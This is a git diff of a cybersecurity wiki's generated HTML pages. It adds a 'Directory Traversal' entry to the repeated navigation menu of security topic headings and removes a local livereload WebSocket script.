        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -200,22 +200,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Hardware Hacking/Wireless Attacks/index.html b/docs/Hardware Hacking/Wireless Attacks/index.html index 9629cb62..12ca7649 100644 --- a/docs/Hardware Hacking/Wireless Attacks/index.html +++ b/docs/Hardware Hacking/Wireless Attacks/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -263,22 +263,6 @@

- - diff --git a/docs/Hardware Hacking/index.html b/docs/Hardware Hacking/index.html index 35dd4f0a..e062c4fe 100644 --- a/docs/Hardware Hacking/index.html +++ b/docs/Hardware Hacking/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
